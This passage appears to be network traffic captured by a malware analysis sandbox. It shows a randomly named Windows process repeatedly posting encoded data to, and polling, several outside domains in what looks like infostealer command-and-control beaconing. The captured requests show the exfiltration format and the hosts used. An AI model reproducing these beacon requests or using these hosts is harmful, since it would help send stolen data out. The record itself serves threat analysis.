                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      15 | 192.168.2.8 | 49732 | 195.110.124.133 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:55.947637081 CET | 1822 | OUT | POST /te2d/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.officinadelpasso.shop
                                                                                      Origin: http://www.officinadelpasso.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.officinadelpasso.shop/te2d/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 56 54 44 4c 72 71 2b 6a 65 50 30 37 6e 31 73 74 54 53 79 79 71 57 48 6e 76 66 79 50 51 73 6a 61 35 41 45 49 68 45 67 66 38 57 30 30 5a 54 35 6a 63 61 46 48 45 79 73 49 4e 43 65 59 44 31 48 53 64 32 73 75 42 70 79 33 65 46 4d 53 46 39 61 66 79 44 46 39 55 31 6e 55 6a 65 6c 51 34 74 69 74 4f 50 64 76 67 56 39 39 47 63 64 53 35 57 50 33 2f 47 31 6f 35 79 38 75 4f 64 6a 65 36 65 50 79 6a 7a 45 41 61 39 64 6b 68 58 69 4d 6c 4f 78 55 57 6f 2f 75 58 53 48 4e 4b 4a 6c 49 76 4c 55 4e 42 30 50 4c 46 59 37 69 61 51 66 65 6e 49 68 65 6c 51 62 6d 71 54 63 50 68 6f 36 4d 58 6a 6d 61 6f 42 30 71 61 41 38 42 37 64 4f 34 33 66 6a 38 55 6a 32 2b 56 74 36 64 4b 58 4e 55 39 7a 6a 42 7a 6e 32 4e 55 51 2f 35 67 77 44 38 78 6c 48 4b 55 63 42 36 66 7a 30 71 7a 67 36 68 74 6a 66 64 42 51 4f 58 58 66 74 62 36 57 62 75 7a 64 66 47 6b 43 41 56 63 76 30 74 62 6d 70 2b 72 50 6e 64 74 4d 52 4f 69 2b 6c 53 4b 33 33 50 31 6a 44 4d 68 72 4e 49 34 51 47 31 50 2f 2b 42 56 4a 74 4c 35 42 4c 6d 43 4c 30 4b 66 4c 46 41 [TRUNCATED]
                                                                                      Data Ascii: UbRxm= [TRUNCATED]
                                                                                      Nov 25, 2024 13:56:57.394995928 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:57 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      16 | 192.168.2.8 | 49733 | 195.110.124.133 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:56:58.612987995 CET | 519 | OUT | GET /te2d/?UbRxm=YRrrocWQCJ4z5Wo4Hyii3lnusY6IScX2szwquVJanj4zZRsRM51rBmkRCj7FWFPYdGZcOIeAVFgSZdyx5BBHZnzVg/hu/fGyJb1Cl3lRDP19pEGPrlJr8lwvIP2DjfyM2w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.officinadelpasso.shop
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:56:59.968991041 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:56:59 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /te2d/ was not found on this server.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      17 | 192.168.2.8 | 49734 | 163.44.185.183 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:57:06.812588930 CET | 779 | OUT | POST /qq1e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.sankan-fukushi.info
                                                                                      Origin: http://www.sankan-fukushi.info
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.sankan-fukushi.info/qq1e/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=OYahKxvKYzpfiZVioGGVaOnBcfp2V/GepvFrPhiXYQKcprGXoB7d6VeGpUxUuUOVOWrtApRa/V6XRu2pXbWf0MN2Llh/S9FPwH2teykGpMS65ZGOpb0Etpvkrs2y+2C7eGvcmVsfZczfS5tTcjsh3tuI823a8lqD2rzz8Pa2tpMeuZ4PR6vC9n9buVryOJoQ5N4WflY=
                                                                                      Nov 25, 2024 13:57:08.291812897 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:57:08 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 19268
                                                                                      Connection: close
                                                                                      Server: Apache
                                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      18 | 192.168.2.8 | 49735 | 163.44.185.183 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:57:09.479331970 CET | 799 | OUT | POST /qq1e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.sankan-fukushi.info
                                                                                      Origin: http://www.sankan-fukushi.info
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.sankan-fukushi.info/qq1e/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=OYahKxvKYzpfg5FikFuVYunGQ/p2efGapvJrPjPSYi+coJuXpA7dqFeGm0xVg0OcOWn6Ap9a/VuXRtipXI+c0cN0eVh9fdFPwH2teyYgpMK65KeOr5MHkJvjjM2y62C3eGvymQR6ZfbfS4dTcWAit9u0iG2W8XXt8c/IxZCSpKIgmPJlLYnE+nVwuWDEL+14juomByNYlzWQR2M8Ui58qglCARxI
                                                                                      Nov 25, 2024 13:57:10.949321985 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:57:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 19268
                                                                                      Connection: close
                                                                                      Server: Apache
                                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      19 | 192.168.2.8 | 49736 | 163.44.185.183 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:57:12.146219015 CET | 1816 | OUT | POST /qq1e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.sankan-fukushi.info
                                                                                      Origin: http://www.sankan-fukushi.info
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.sankan-fukushi.info/qq1e/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Nov 25, 2024 13:57:13.611373901 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:57:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 19268
                                                                                      Connection: close
                                                                                      Server: Apache
                                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                      Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49737 | 163.44.185.183 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:14.804229975 CET | 517 | OUT | GET /qq1e/?UbRxm=DayBJHTwMg56rcld9n6KWZbVQKFRYd6Y2OVvMB/QfV+VoLW2vz3Ysj2Lu1Mz5EvoA06VXqhN10X9MeLBCKiZ8LZ2VXddbMNCxmaFYlM5w9+CsZ6D34cvk8XDh8Pk/EneAg==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.sankan-fukushi.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Nov 25, 2024 13:57:16.247544050 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:57:16 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 19268
                                                                                      Connection: close
                                                                                      Server: Apache
                                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49738 | 118.107.250.103 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:22.406580925 CET | 749 | OUT | POST /z2jp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.zxyck.net
                                                                                      Origin: http://www.zxyck.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.zxyck.net/z2jp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Nov 25, 2024 13:57:23.917579889 CET | 307 | IN | HTTP/1.1 200 OK
                                                                                      Server: Tengine
                                                                                      Date: Mon, 25 Nov 2024 12:56:23 GMT
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49739 | 118.107.250.103 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:25.258889914 CET | 769 | OUT | POST /z2jp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.zxyck.net
                                                                                      Origin: http://www.zxyck.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.zxyck.net/z2jp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Nov 25, 2024 13:57:26.649008989 CET | 307 | IN | HTTP/1.1 200 OK
                                                                                      Server: Tengine
                                                                                      Date: Mon, 25 Nov 2024 12:56:26 GMT
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc 54 20 cb 28 ab 40 0f 00 ae fc 5f dc 1c 00 00 00 0d 0a 30 0d 0a 0d 0a


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49740 | 118.107.250.103 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:28.120556116 CET | 1786 | OUT | POST /z2jp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.zxyck.net
                                                                                      Origin: http://www.zxyck.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.zxyck.net/z2jp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Nov 25, 2024 13:57:29.715142012 CET | 307 | IN | HTTP/1.1 200 OK
                                                                                      Server: Tengine
                                                                                      Date: Mon, 25 Nov 2024 12:56:29 GMT
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc 54 20 cb 28 ab 40 0f 00 ae fc 5f dc 1c 00 00 00 0d 0a 30 0d 0a 0d 0a


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49741 | 118.107.250.103 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:30.943825960 CET | 507 | OUT | GET /z2jp/?UbRxm=OHC+NpFe2K8jmTlicXvXjJ+QVEgSatfCtasqPMFJtNXA1CIQdaIwTH1aekp09+pbZOA1peX5og6OyDAWYalTXTww0fqX4q90/3pIZSi2lNK2VQoZjt3+Z09NDWePsk/Y+A==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.zxyck.net
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Nov 25, 2024 13:57:32.408495903 CET | 266 | IN | HTTP/1.1 200 OK
                                                                                      Server: Tengine
                                                                                      Date: Mon, 25 Nov 2024 12:56:31 GMT
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 7a 32 6a 70 2e 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 1c/www/wwwroot/zxyck.net/z2jp.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49742 | 13.248.169.48 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:38.048593998 CET | 755 | OUT | POST /grhe/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.krshop.shop
                                                                                      Origin: http://www.krshop.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.krshop.shop/grhe/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=NF59V08ranzh6rySUlFyB+0AY7Ps7ewYL8+aLkDZdLMNeblhALh/tkDOGaJHgEMUq2KGJXC9rsmZWPC2MhB4c8MO3b/Cc/34QUchLPq1/06ytw3JA+p3ZgaB9ITp287vn7K28eZgx/g9VtoZKFBOXat2A8aDrBh1lSS6MWw0XSVSbtjnqQmoQIB/WEn60TnDbaDmNIg=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49743 | 13.248.169.48 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:40.815093994 CET | 775 | OUT | POST /grhe/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.krshop.shop
                                                                                      Origin: http://www.krshop.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.krshop.shop/grhe/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=NF59V08ranzh7IqSWG9yEe0fUbPsw+xRL8yaLlHwdYoNf/hhHJZ/skDOeKJG9UMfq2GgJW+9rvaZWLO2MQB7esMAsr/ASf34QUchLPuP/0SytD/JAfp0HQaC+ITp8s7rn7KE8ctKx9o9Vt4ZKUBNAKtwdsbplUcDiiGKQlQGJCVsabSNwyuuTIpUWHPMxk6rB5TWTf08hhQBeNQGvxF5Ebob/NPG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49744 | 13.248.169.48 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:43.484471083 CET | 1792 | OUT | POST /grhe/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.krshop.shop
                                                                                      Origin: http://www.krshop.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.krshop.shop/grhe/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 49745 | 13.248.169.48 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:46.146519899 CET | 509 | OUT | GET /grhe/?UbRxm=AHRdWC0KZWrjxYC0KXJ/Pc0Ifc3a5dIjcNypL3DdH/M5f69FO55V4y/zfqI4/XMCrlXFD3GasOekPJK0GQB6Xv0fwrTDR9rlUwQmGtKqhkKLqQH5fcp3eHuY6Kvt/u2Y7w==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.krshop.shop
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Nov 25, 2024 13:57:47.413077116 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Mon, 25 Nov 2024 12:57:47 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 274
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbRxm=AHRdWC0KZWrjxYC0KXJ/Pc0Ifc3a5dIjcNypL3DdH/M5f69FO55V4y/zfqI4/XMCrlXFD3GasOekPJK0GQB6Xv0fwrTDR9rlUwQmGtKqhkKLqQH5fcp3eHuY6Kvt/u2Y7w==&YvA4=xnL8AvI8CJiPEDU"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49746 | 84.32.84.32 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:53.088752031 CET | 767 | OUT | POST /5kax/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.samundri.online
                                                                                      Origin: http://www.samundri.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.samundri.online/5kax/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm=pF5jkKO85i1hB/rVnGwi6MJYA1MpxRsP0T8IpgoFYF5a2zY8u0To251hU28ectPXgf4gMu5b4CyG99o9RQVWW0vbL/n7KvqWHgqwQEF2EJeQ7Q8t1nv03FZw7gcex51hYo9RsbPvYlB3Z11id2LuCPAsqfIfWHkjyaqbm0trEDU5+CbnuDc1aBJEgz38WvGuMAKSBnA=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49747 | 84.32.84.32 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 13:57:55.758558035 CET | 787 | OUT | POST /5kax/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.samundri.online
                                                                                      Origin: http://www.samundri.online
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.samundri.online/5kax/
